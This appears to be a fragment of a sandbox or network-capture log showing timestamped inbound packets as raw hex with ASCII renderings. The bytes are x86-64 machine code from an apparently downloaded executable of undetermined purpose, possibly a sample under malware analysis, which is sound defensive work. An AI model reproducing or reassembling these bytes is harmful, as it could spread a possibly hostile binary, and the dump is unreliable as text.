                                                                                                                                                            2022-07-07 07:51:09 UTC52INData Raw: 00 00 00 4c 8d 0c 24 48 8d 05 23 26 09 00 48 89 05 44 64 0a 00 48 8d 05 9d 11 07 00 48 89 04 24 49 8b 01 48 89 87 e8 34 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 34 0b 00 89 5c 24 0c c7 05 2a 64 0a 00 01 00 00 00 c7 05 24 64 0a 00 04 00 00 00 4c 8d 0c 24 48 8d 05 c5 25 09 00 48 89 05 16 64 0a 00 48 8d 05 4f 38 00 00 48 89 04 24 49 8b 01 48 89 87 08 35 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 35 0b 00 89 5c 24 0c c7 05 fc 63 0a 00 01 00 00 00 c7 05 f6 63 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 6f 25 09 00 48 89 05 e8 63 0a 00 48 8d 05 a1 96 06 00 48 89 04 24 49 8b 01 48 89 87 28 35 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 30 35 0b 00 48 8d 05 2d 25 09 00 89 5c 24 08 48 89 05 d2 63 0a 00 48 8d 05 4b 96 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 ae 63 0a 00
                                                                                                                                                            Data Ascii: L$H#&HDdHH$IH4IA\$H4\$*d$dL$H%HdHO8H$IH5IA\$H5\$ccL$Ho%HcHH$IH(5IAL$H05H-%\$HcHK\$H$Ic
                                                                                                                                                            2022-07-07 07:51:09 UTC53INData Raw: 8b 41 08 89 5c 24 08 48 89 87 10 37 0b 00 89 5c 24 0c c7 05 1c 61 0a 00 02 00 00 00 c7 05 16 61 0a 00 07 00 00 00 4c 8d 0c 24 48 8d 05 17 1f 09 00 48 89 05 08 61 0a 00 48 8d 05 71 ca 05 00 48 89 04 24 49 8b 01 48 89 87 28 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 37 0b 00 89 5c 24 0c 89 1d f2 60 0a 00 89 1d f0 60 0a 00 4c 8d 0c 24 48 8d 05 b1 1e 09 00 48 89 05 e2 60 0a 00 48 8d 05 4b ca 05 00 48 89 04 24 49 8b 01 48 89 87 48 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 37 0b 00 89 5c 24 0c c7 05 c8 60 0a 00 02 00 00 00 c7 05 c2 60 0a 00 0a 00 00 00 4c 8d 0c 24 48 8d 05 53 1e 09 00 48 89 05 b4 60 0a 00 48 8d 05 8d d7 05 00 48 89 04 24 49 8b 01 48 89 87 68 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 37 0b 00 89 5c 24 0c 4c 8d 0c 24 48 8d 05 09 1e 09 00
                                                                                                                                                            Data Ascii: A\$H7\$aaL$HHaHqH$IH(7IA\$H07\$``L$HH`HKH$IHH7IA\$HP7\$``L$HSH`HH$IHh7IA\$Hp7\$L$H
                                                                                                                                                            2022-07-07 07:51:09 UTC55INData Raw: 0c 4c 8d 0c 24 48 8d 05 bb 8c 05 00 48 89 04 24 49 8b 01 48 89 87 48 39 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 39 0b 00 89 5c 24 0c c7 05 e8 5d 0a 00 01 00 00 00 c7 05 e2 5d 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 ab 17 09 00 48 89 05 d4 5d 0a 00 48 8d 05 ed 8e 05 00 48 89 04 24 49 8b 01 48 89 87 68 39 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 39 0b 00 89 5c 24 0c c7 05 ba 5d 0a 00 01 00 00 00 c7 05 b4 5d 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 3d 17 09 00 48 89 05 a6 5d 0a 00 48 8d 05 3f 92 05 00 48 89 04 24 49 8b 01 48 89 87 88 39 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 39 0b 00 89 5c 24 0c c7 05 8c 5d 0a 00 01 00 00 00 c7 05 86 5d 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 d7 16 09 00 48 89 05 78 5d 0a 00 48 8d 05 81 90 05 00 48 89 04 24 49 8b 01 48 89
                                                                                                                                                            Data Ascii: L$HH$IHH9IA\$HP9\$]]L$HH]HH$IHh9IA\$Hp9\$]]L$H=H]H?H$IH9IA\$H9\$]]L$HHx]HH$IH
                                                                                                                                                            2022-07-07 07:51:09 UTC56INData Raw: 05 a9 10 09 00 89 5c 24 08 48 89 05 de 5a 0a 00 48 8d 05 47 67 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 ba 5a 0a 00 01 00 00 00 c7 05 b4 5a 0a 00 01 00 00 00 48 89 87 88 3b 0b 00 49 8b 41 08 48 89 87 90 3b 0b 00 89 5c 24 08 89 5c 24 0c c7 05 ac 5a 0a 00 02 00 00 00 c7 05 a6 5a 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 17 10 09 00 48 89 05 98 5a 0a 00 48 8d 05 11 8c 07 00 48 89 04 24 49 8b 01 48 89 87 a8 3b 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 3b 0b 00 89 5c 24 0c c7 05 7e 5a 0a 00 01 00 00 00 c7 05 78 5a 0a 00 04 00 00 00 4c 8d 0c 24 48 8d 05 a9 0f 09 00 48 89 05 6a 5a 0a 00 48 8d 05 13 ef 06 00 48 89 04 24 49 8b 01 48 89 87 c8 3b 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 3b 0b 00 89 5c 24 0c c7 05 50 5a 0a 00 01 00 00 00 c7 05 4a 5a 0a 00 02 00 00
                                                                                                                                                            Data Ascii: \$HZHGg\$H$IZZH;IAH;\$\$ZZL$HHZHH$IH;IA\$H;\$~ZxZL$HHjZHH$IH;IA\$H;\$PZJZ
                                                                                                                                                            2022-07-07 07:51:09 UTC60INData Raw: 24 48 8d 05 51 fa 08 00 48 89 05 3a 51 0a 00 48 8d 05 e3 c7 07 00 48 89 04 24 49 8b 01 48 89 87 68 42 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 70 42 0b 00 48 8d 05 07 fa 08 00 89 5c 24 08 48 89 05 24 51 0a 00 48 8d 05 4d cb 07 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 00 51 0a 00 01 00 00 00 c7 05 fa 50 0a 00 02 00 00 00 48 89 87 88 42 0b 00 49 8b 41 08 48 89 87 90 42 0b 00 c7 05 fa 50 0a 00 01 00 00 00 c7 05 f4 50 0a 00 02 00 00 00 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 48 8d 05 85 f9 08 00 48 89 05 de 50 0a 00 48 8d 05 57 d4 07 00 48 89 04 24 49 8b 01 48 89 87 a8 42 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 42 0b 00 89 5c 24 0c c7 05 c4 50 0a 00 01 00 00 00 c7 05 be 50 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 1f f9 08 00 48 89 05 b0 50 0a 00 48 8d 05 a9 d4 07
                                                                                                                                                            Data Ascii: $HQH:QHH$IHhBIAL$HpBH\$H$QHM\$H$IQPHBIAHBPP\$\$L$HHPHWH$IHBIA\$HB\$PPL$HHPH
                                                                                                                                                            2022-07-07 07:51:09 UTC64INData Raw: 4c 8d 84 24 18 01 00 00 48 8d 94 24 b0 00 00 00 48 8d 0d 15 68 0b 00 c7 44 24 20 01 00 00 00 e8 c0 03 00 00 48 8b b4 24 18 01 00 00 83 7e 08 05 0f 84 5e 8f 02 00 8b 94 24 08 01 00 00 48 8b 47 08 8b ca 48 89 74 24 70 4c 8b 04 c8 66 45 39 60 08 0f 84 bf 8f 02 00 ff c2 4c 8d 4c 24 30 4c 8d 84 24 08 01 00 00 89 94 24 08 01 00 00 48 8b cd 48 8b d7 c7 44 24 20 ff ff ff ff e8 e4 54 ff ff 85 c0 0f 85 49 93 02 00 48 8d 54 24 30 48 8b ce e8 bf 78 ff ff 8b 8c 24 08 01 00 00 48 8b 47 08 48 8b 14 c8 66 44 39 62 08 0f 85 10 93 02 00 83 3a 0f 0f 85 07 93 02 00 44 8b 9c 24 08 01 00 00 4c 8d 4c 24 30 4c 8d 84 24 08 01 00 00 41 ff c3 48 8b d7 48 8b cd 44 89 9c 24 08 01 00 00 c7 44 24 20 ff ff ff ff e8 79 54 ff ff 85 c0 0f 85 de 92 02 00 48 8d 54 24 30 48 8d 4c 24 78 e8 52
                                                                                                                                                            Data Ascii: L$H$HhD$ H$~^$HGHt$pLfE9`LL$0L$$HHD$ TIHT$0Hx$HGHfD9b:D$LL$0L$AHHD$D$ yTHT$0HL$xR
                                                                                                                                                            2022-07-07 07:51:09 UTC65INData Raw: 00 0f 85 ad 25 02 00 4c 8d 05 11 64 0b 00 48 8d 0d 0a 64 0b 00 48 8b d6 e8 7a f1 ff ff 84 c0 74 72 48 8b 0d f7 63 0b 00 48 85 c9 74 66 8b 41 20 48 8b 49 28 25 00 ff 00 00 89 07 48 89 0b 48 85 c9 74 3e b0 01 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 41 83 e8 01 0f 85 18 25 02 00 48 83 3d d8 63 0b 00 00 0f 85 2d 25 02 00 4d 8b c1 48 8d 0d a8 63 0b 00 e8 db 0f 00 00 48 8b c8 eb ba 48 8b 5c 24 30 48 8b 74 24 38 32 c0 48 83 c4 20 5f c3 33 c9 eb a4 83 79 08 02 75 05 48 8b 01 f3 c3 80 79 19 00 48 8b 41 10 48 8b 40 18 74 f0 e9 c2 0d 02 00 cc cc 48 89 5c 24 08 48 89 6c 24 18 48 89 74 24 20 57 41 54 41 55 41 56 41 57 48 81 ec 50 01 00 00 45 8b 18 4c 8b 52 08 33 db 89 5c 24 30 c7 44 24 38 01 00 00 00 48 89 5c 24 40 41 8d 43 ff 49 8b f9 4c 8b f9 49 8b 04 c2 44
                                                                                                                                                            Data Ascii: %LdHdHztrHcHtfA HI(%HHt>H\$0Ht$8H _A%H=c-%MHcHH\$0Ht$82H _3yuHyHAH@tH\$Hl$Ht$ WATAUAVAWHPELR3\$0D$8H\$@ACILID
                                                                                                                                                            2022-07-07 07:51:09 UTC69INData Raw: ff 00 00 89 0f 48 8b 5c 24 30 48 83 c4 20 5f c3 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 33 ff 48 8b d9 48 83 c1 10 48 89 79 f0 e8 04 28 00 00 48 8d 8b 18 01 00 00 e8 d8 e6 ff ff 48 8d 8b 38 01 00 00 e8 cc e6 ff ff 48 8d 8b 58 01 00 00 e8 c0 e6 ff ff 48 8d 8b 78 01 00 00 e8 b4 e6 ff ff 48 8d 8b c0 01 00 00 e8 68 03 00 00 8d 4f 08 e8 28 58 00 00 48 85 c0 0f 84 97 0e 02 00 48 89 38 48 8d 0d 6d a1 08 00 48 89 03 ff 15 0c 67 08 00 89 43 08 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 30 48 8b f9 48 8d 4c 24 58 49 8b d8 ff 15 05 5c 08 00 85 c0 0f 84 9d 17 02 00 0f 29 74 24 20 66 0f ef f6 48 8b cb f2 48 0f 2a 74 24 58 e8 25 63 ff ff c7 43 08 03 00 00 00 f2 0f 11 33 0f 28 74 24 20 33 c0
                                                                                                                                                            Data Ascii: H\$0H _3H\$0H _H\$WH 3HHHy(HH8HXHxHhO(XHH8HmHgCHH\$0H _H\$WH0HHL$XI\)t$ fHH*t$X%cC3(t$ 3
                                                                                                                                                            2022-07-07 07:51:09 UTC73INData Raw: 10 53 48 83 ec 20 48 8b d9 e8 7f 53 ff ff 0f b6 44 24 38 88 03 48 8b c3 c7 43 08 09 00 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc 48 83 ec 28 8b 05 46 61 0b 00 a8 01 74 0d f2 0f 10 05 32 61 0b 00 48 83 c4 28 c3 83 c8 01 48 8d 0d 23 61 0b 00 89 05 25 61 0b 00 e8 40 36 00 00 f2 0f 10 05 10 61 0b 00 48 83 c4 28 c3 cc cc cc 66 0f 28 c8 8b c2 85 d2 78 28 f2 0f 10 15 56 15 09 00 66 0f 28 c2 a8 01 74 04 f2 0f 59 c1 d1 e8 74 06 f2 0f 59 c9 eb ee 85 d2 0f 88 70 ec 01 00 f3 c3 f7 d8 eb d4 cc cc cc cc cc cc cc cc cc cc 48 89 74 24 10 57 48 83 ec 20 48 8b 41 18 48 8b f2 48 8b f9 48 39 41 10 74 37 b9 08 00 00 00 e8 54 47 00 00 48 85 c0 0f 84 33 eb 01 00 48 8b 0e 4c 8b d8 48 89 08 48 8b 4f 10 48 8b 47 08 48 8b 74 24 38 4c 89 1c c8 48 ff 47 10 48 83 c4 20 5f c3 48
                                                                                                                                                            Data Ascii: SH HSD$8HCH [H(Fat2aH(H#a%a@6aH(f(x(Vf(tYtYpHt$WH HAHHH9At7TGH3HLHHOHGHt$8LHGH _H
                                                                                                                                                            2022-07-07 07:51:09 UTC78INData Raw: 00 44 39 4c 24 58 0f 85 40 ff 01 00 44 39 4c 24 60 0f 85 3c ff 01 00 44 39 4c 24 68 0f 85 fd fe 01 00 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 30 49 8b f0 4c 8d 4c 24 58 4c 8d 44 24 20 48 8b da 48 8b f9 c7 44 24 20 01 00 00 00 e8 81 da ff ff 85 c0 75 32 44 8b 4c 24 20 48 8b 43 08 4a 8b 14 c8 66 83 7a 08 7f 0f 85 e5 5d 02 00 80 7c 24 58 00 48 8d 8f 80 02 00 00 75 1c e8 32 03 00 00 8b 48 04 ff c1 89 0e 48 8b 5c 24 40 48 8b 74 24 48 48 83 c4 30 5f c3 e8 16 d2 ff ff 48 8b 5c 24 40 48 8b 74 24 48 48 83 c4 30 5f c3 cc cc cc cc cc cc 80 79 11 00 48 8b 41 08 0f 85 72 db 01 00 f3 c3 48 89 5c 24 10 48 89 74 24 20 57 48 83 ec 20 48 8b d9 48 81 c1 80 02 00 00 48 8b f2 e8 cf 02 00 00 48 8d 0d b8 46 0b
                                                                                                                                                            Data Ascii: D9L$X@D9L$`<D9L$h3H(H\$Ht$WH0ILL$XLD$ HHD$ u2DL$ HCJfz]|$XHu2HH\$@Ht$HH0_H\$@Ht$HH0_yHArH\$Ht$ WH HHHHF
                                                                                                                                                            2022-07-07 07:51:09 UTC82INData Raw: 8d 4c 24 30 e8 4a 53 00 00 48 8d 54 24 30 48 8d 4f 10 e8 9c 35 00 00 48 ff c3 48 83 fb 10 7c d3 48 8b 5c 24 40 48 8b 74 24 48 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 8b 41 44 48 8b f1 41 8b f8 46 8d 0c c0 8b c8 42 8d 04 c5 00 00 00 00 c1 e9 03 48 8b ea 44 89 4e 44 83 e1 3f 44 3b c8 0f 82 7f d9 01 00 41 8b c0 bb 40 00 00 00 c1 e8 1d 2b d9 01 46 48 44 3b c3 73 2a 33 db 2b fb 8b d3 48 8d 4c 31 4c 44 8b c7 48 03 d5 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f e9 a0 1e 00 00 48 8d 4c 31 4c 44 8b c3 e8 93 1e 00 00 48 8d 56 4c 48 8b ce e8 17 00 00 00 8d 43 3f 3b c7 0f 82 24 d9 01 00 33 c9 eb b0 cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 48 89 4c 24 08 57 41 54 41 55 41 56 41
                                                                                                                                                            Data Ascii: L$0JSHT$0HO5HH|H\$@Ht$HH _H\$Hl$Ht$WH ADHAFBHDND?D;A@+FHD;s*3+HL1LDHH\$0Hl$8Ht$@H _HL1LDHVLHC?;$3H\$Hl$Ht$ HL$WATAUAVA
                                                                                                                                                            2022-07-07 07:51:09 UTC86INData Raw: 00 33 d2 c7 41 0c 04 00 00 00 48 8b d9 8d 4a 5b ff 15 78 24 08 00 33 d2 8d 4a 10 88 43 35 ff 15 6a 24 08 00 33 d2 b9 a0 00 00 00 88 43 32 ff 15 5a 24 08 00 33 d2 b9 a1 00 00 00 88 43 33 ff 15 4a 24 08 00 33 d2 8d 4a 11 88 43 34 ff 15 3c 24 08 00 33 d2 8d 4a 12 88 43 30 ff 15 2e 24 08 00 88 43 31 48 83 c4 20 5b c3 cc cc cc cc cc 48 8d 05 79 61 08 00 48 89 01 33 c0 48 89 41 08 48 89 41 10 88 41 18 88 41 19 48 8b c1 c3 cc cc 48 83 ec 38 48 63 41 18 83 f8 06 0f 8d 8f c2 01 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc 44 8b 41 04 33 d2 b9 01 20 00 00 44 8d 4a 02 48 ff 25 42 25 08 00 cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 4c 8d 44 24 30 45 33 c9 33 d2 b9 00 20 00 00 ff 15 1a 25 08 00 44 8b 5c 24 30 41 b9 02 00 00 00 45 33 c0 33 d2 b9 01 20
                                                                                                                                                            Data Ascii: 3AHJ[x$3JC5j$3C2Z$3C3J$3JC4<$3JC0.$C1H [HyaH3HAHAAAHH8HcAH8DA3 DJH%B%@SH HLD$0E33 %D\$0AE33
                                                                                                                                                            2022-07-07 07:51:09 UTC90INData Raw: 36 f6 c1 01 74 0b 48 ff c9 8a 04 0a 49 ff c8 88 01 f6 c1 02 74 0f 48 83 e9 02 66 8b 04 0a 49 83 e8 02 66 89 01 f6 c1 04 74 0d 48 83 e9 04 8b 04 0a 49 83 e8 04 89 01 4d 8b c8 49 c1 e9 05 75 50 4d 8b c8 49 c1 e9 03 74 14 48 83 e9 08 48 8b 04 0a 49 ff c9 48 89 01 75 f0 49 83 e0 07 4d 85 c0 75 07 49 8b c3 c3 0f 1f 00 48 ff c9 8a 04 0a 49 ff c8 88 01 75 f3 49 8b c3 c3 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 66 66 90 66 66 90 49 81 f9 00 20 00 00 73 42 48 8b 44 0a f8 4c 8b 54 0a f0 48 83 e9 20 48 89 41 18 4c 89 51 10 48 8b 44 0a 08 4c 8b 14 0a 49 ff c9 48 89 41 08 4c 89 11 75 d5 49 83 e0 1f e9 73 ff ff ff 66 66 66 66 0f 1f 84 00 00 00 00 00 66 90 48 81 fa 00 f0 ff ff 77 b5 b8 20 00 00 00 48 81 e9 80 00 00 00 0f 18 04 0a 0f 18 44 0a 40 ff c8 75 ec 48 81
                                                                                                                                                            Data Ascii: 6tHItHfIftHIMIuPMItHHIHuIMuIHIuIffffffffffffI sBHDLTH HALQHDLIHALuIsfffffHw HD@uH
                                                                                                                                                            2022-07-07 07:51:09 UTC94INData Raw: 00 00 83 6c 24 38 01 8b d8 78 17 48 8b 4c 24 30 c6 01 00 48 8b 4c 24 30 48 ff c1 48 89 4c 24 30 eb 11 48 8d 54 24 30 33 c9 e8 7e 85 00 00 48 8b 4c 24 30 83 6c 24 38 01 78 05 c6 01 00 eb 0c 48 8d 54 24 30 33 c9 e8 61 85 00 00 8b c3 48 83 c4 60 5b c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 48 83 ec 50 45 33 e4 49 8b e8 48 8b f2 48 8b f9 41 8b c4 4d 3b c4 0f 84 dd 00 00 00 49 3b cc 75 29 e8 09 71 00 00 45 33 c9 45 33 c0 33 d2 33 c9 4c 89 64 24 20 c7 00 16 00 00 00 e8 1f 70 00 00 b8 ff ff ff 7f e9 af 00 00 00 49 3b d4 74 d2 48 8d 4c 24 30 49 8b d1 e8 bb f1 ff ff 4c 8b 5c 24 30 45 39 63 14 75 41 0f b7 1f 66 83 fb 41 72 0a 66 83 fb 5a 77 04 66 83 c3 20 0f b7 06 66 83 f8 41 72 0a 66 83 f8 5a 77 04 66 83 c0 20 48 83 c7 02 48 83 c6 02 48
                                                                                                                                                            Data Ascii: l$8xHL$0HL$0HHL$0HT$03~HL$0l$8xHT$03aH`[HHXHhHpHx ATHPE3IHHAM;I;u)qE3E333Ld$ pI;tHL$0IL\$0E9cuAfArfZwf fArfZwf HHH
                                                                                                                                                            2022-07-07 07:51:09 UTC97INData Raw: 83 ec 28 e8 3f 51 00 00 90 48 8b 88 98 00 00 00 ff 90 90 00 00 00 8b c8 e8 9e ff ff ff 90 8b c8 e8 fa ec ff ff 90 48 83 c4 28 c3 40 53 48 83 ec 20 48 8b d9 e8 a2 4f 00 00 e8 95 4f 00 00 8b c8 e8 86 4f 00 00 4c 8b d8 48 85 c0 75 2c e8 81 4f 00 00 48 8b d3 8b c8 e8 83 4f 00 00 85 c0 75 0f ff 15 e1 ef 07 00 8b c8 ff 15 21 f0 07 00 cc ff 15 a2 ec 07 00 89 03 eb 2c 48 8b 83 90 00 00 00 48 8b cb 49 89 83 90 00 00 00 48 8b 83 98 00 00 00 49 89 83 98 00 00 00 48 8b 43 08 49 89 43 08 e8 c6 50 00 00 48 83 3d 82 17 08 00 00 74 16 48 8d 0d 79 17 08 00 e8 cc 6c 00 00 85 c0 74 06 ff 15 6a 17 08 00 e8 35 ff ff ff cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 20 57 41 54 41 55 48 83 ec 30 33 db 49 8b e9 49 8b f0 44 8b e2 4c 8b e9 4d 85 c0 75 24 e8 40 64 00 00 48 21 5c 24
                                                                                                                                                            Data Ascii: (?QHH(@SH HOOOLHu,OHOu!,HHIHIHCICPH=tHyltj5H\$Hl$Ht$ WATAUH03IIDLMu$@dH!\$
                                                                                                                                                            2022-07-07 07:51:09 UTC101INData Raw: d2 33 c9 c7 00 16 00 00 00 e8 d8 53 00 00 0b c7 eb 46 f6 41 18 83 74 3a e8 b5 f8 ff ff 48 8b cb 8b f8 e8 13 b3 00 00 48 8b cb e8 b3 f4 ff ff 8b c8 e8 ec b1 00 00 85 c0 79 05 83 cf ff eb 13 48 8b 4b 28 48 85 c9 74 0a e8 4d e8 ff ff 48 83 63 28 00 83 63 18 00 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 cc cc cc 48 89 5c 24 10 48 89 4c 24 08 57 48 83 ec 30 48 8b d9 83 cf ff 33 c0 48 85 c9 0f 95 c0 85 c0 75 24 e8 2a 54 00 00 c7 00 16 00 00 00 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 e8 3f 53 00 00 8b c7 eb 26 f6 41 18 40 74 06 83 61 18 00 eb 18 e8 02 2d 00 00 90 48 8b cb e8 15 ff ff ff 8b f8 48 8b cb e8 7f 2d 00 00 8b c7 48 8b 5c 24 48 48 83 c4 30 5f c3 cc cc 48 89 5c 24 20 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 33 db 4c 8b e9 4c 8b f1 48 89 4c 24 78
                                                                                                                                                            Data Ascii: 3SFAt:HHyHK(HtMHc(cH\$@H0_H\$HL$WH0H3Hu$*THd$ E3E333?S&A@ta-HH-H\$HH0_H\$ UVWATAUAVAWH03LLHL$x
                                                                                                                                                            2022-07-07 07:51:09 UTC105INData Raw: ba 00 00 00 00 82 f8 02 00 48 03 c1 48 3b c2 77 71 f2 0f 5c 25 bc 95 08 00 66 0f 28 c4 66 0f 28 d4 f2 0f 58 05 bc e3 07 00 f2 0f 5e d0 66 0f 28 da f2 0f 58 d2 f2 0f 59 dc 66 0f 28 ca f2 0f 59 ca 66 0f 28 c1 f2 0f 59 05 58 e3 07 00 f2 0f 58 05 48 e3 07 00 f2 0f 59 c1 f2 0f 58 05 34 e3 07 00 f2 0f 59 c1 f2 0f 59 ca f2 0f 58 05 1c e3 07 00 f2 0f 59 c1 f2 0f 5c c3 f2 0f 58 c4 e9 32 01 00 00 48 b8 00 00 00 00 00 00 10 00 48 3b c8 73 32 48 b8 00 00 00 00 00 00 d0 03 48 0b c8 b8 3c 00 00 00 48 89 4c 24 60 f2 0f 10 44 24 60 f2 0f 5c 05 1f e3 07 00 f2 0f 11 44 24 60 48 8b 4c 24 60 eb 02 33 c0 48 8b d1 49 b8 ff ff ff ff ff ff 0f 00 48 c1 ea 34 81 e2 ff 07 00 00 2b d0 48 8b c1 49 23 c0 81 ea ff 03 00 00 49 b8 00 00 00 00 00 00 e0 3f 49 0b c0 48 89 44 24 60 48 8b c1
                                                                                                                                                            Data Ascii: HH;wq\%f(f(X^f(XYf(Yf(YXXHYX4YYXY\X2HH;s2HH<HL$`D$`\D$`HL$`3HIH4+HI#I?IHD$`H
                                                                                                                                                            2022-07-07 07:51:09 UTC110INData Raw: 00 00 00 00 20 3f 48 3b d0 73 46 48 b8 00 00 00 00 00 00 40 3e 48 3b d0 73 21 48 85 d2 0f 84 a0 02 00 00 ba 10 00 00 00 33 c9 44 8b c2 e8 ea 9e 00 00 66 0f 28 c6 e9 88 02 00 00 f2 0f 59 c6 f2 0f 59 c6 f2 0f 59 05 55 ce 07 00 f2 0f 5c f0 eb e1 66 0f 57 c9 e8 0a fe ff ff e9 64 02 00 00 49 b8 00 00 00 00 00 00 f0 7f 48 8b c1 49 23 c0 49 3b c0 75 70 66 0f 57 c0 c7 44 24 40 01 00 00 00 48 b8 ff ff ff ff ff ff 0f 00 f2 0f 11 44 24 38 41 b9 01 00 00 00 f2 0f 11 74 24 30 c7 44 24 28 21 00 00 00 41 8d 51 1d 48 85 c8 74 23 49 b8 00 00 00 00 00 00 08 00 4c 0b c1 83 64 24 20 00 48 8d 0d 92 d5 07 00 e8 65 89 00 00 e9 f3 01 00 00 c7 44 24 20 08 00 00 00 49 b8 00 00 00 00 00 00 f8 ff eb db f2 0f 10 3d fc 84 08 00 33 ff 48 3b d1 40 0f 95 c7 85 ff 74 04 66 0f 57 f7 f2 0f
                                                                                                                                                            Data Ascii: ?H;sFH@>H;s!H3Df(YYYU\fWdIHI#I;upfWD$@HD$8At$0D$(!AQHt#ILd$ HeD$ I=3H;@tfW
                                                                                                                                                            2022-07-07 07:51:09 UTC114INData Raw: 48 8b cb e8 f7 a9 00 00 85 c0 74 15 8b 44 24 50 8b 4c 24 68 c7 43 20 01 00 00 00 03 c1 48 98 eb 05 48 63 44 24 50 48 63 0b 49 b8 89 88 88 88 88 88 88 88 48 2b c8 49 8b c0 48 f7 e9 48 03 d1 48 c1 fa 05 48 8b c2 48 c1 e8 3f 48 03 d0 48 8b c1 48 6b d2 3c 48 2b c2 89 03 85 c0 79 09 83 c0 3c 48 83 e9 3c 89 03 49 8b c0 48 f7 e9 4c 8d 0c 11 49 c1 f9 05 49 8b c1 48 c1 e8 3f 4c 03 c8 48 63 43 04 4c 03 c8 49 8b c0 49 8b c9 49 f7 e9 49 03 d1 48 c1 fa 05 48 8b c2 48 c1 e8 3f 48 03 d0 48 6b d2 3c 48 2b ca 89 4b 04 85 c9 79 0a 83 c1 3c 49 83 e9 3c 89 4b 04 49 8b c0 49 f7 e9 4d 8d 04 11 49 b9 ab aa aa aa aa aa aa 2a 49 c1 f8 05 49 8b c0 48 c1 e8 3f 4c 03 c0 48 63 43 08 4c 03 c0 49 8b c1 49 f7 e8 48 c1 fa 02 48 8b c2 48 c1 e8 3f 48 03 d0 48 8d 0c 52 49 8b d0 48 c1 e1 03
                                                                                                                                                            Data Ascii: HtD$PL$hC HHcD$PHcIH+IHHHHH?HHHk<H+y<H<IHLIIH?LHcCLIIIIHHH?HHk<H+Ky<I<KIIMI*IIH?LHcCLIIHHH?HHRIH
                                                                                                                                                            2022-07-07 07:51:09 UTC118INData Raw: 38 48 83 c4 20 5f c3 cc cc cc 40 53 48 83 ec 20 48 8b d9 8b 0d 15 fc 08 00 83 f9 ff 74 24 48 85 db 75 0f ff 15 fd 9d 07 00 8b 0d ff fb 08 00 48 8b d8 33 d2 ff 15 f4 9d 07 00 48 8b cb e8 90 fe ff ff 48 83 c4 20 5b c3 cc cc 40 53 48 83 ec 20 e8 5d 9a ff ff e8 10 17 00 00 85 c0 74 60 48 8d 0d 6d fe ff ff ff 15 f3 9d 07 00 89 05 bd fb 08 00 83 f8 ff 74 48 ba c8 02 00 00 b9 01 00 00 00 e8 b5 00 00 00 48 8b d8 48 85 c0 74 31 8b 0d 9b fb 08 00 48 8b d0 ff 15 92 9d 07 00 85 c0 74 1e 33 d2 48 8b cb e8 cc fc ff ff ff 15 ce 99 07 00 48 83 4b 08 ff 89 03 b8 01 00 00 00 eb 07 e8 8b fc ff ff 33 c0 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 33 ff 48 8b f1 83 cd ff 48 8b ce e8 74 a3 ff ff 48 8b d8 48 85 c0 75 28 39 05 1a 6c 09
                                                                                                                                                            Data Ascii: 8H _@SH Ht$HuH3HH [@SH ]t`HmtHHHt1Ht3HHK3H [H\$Hl$Ht$WH 3HHtHHu(9l
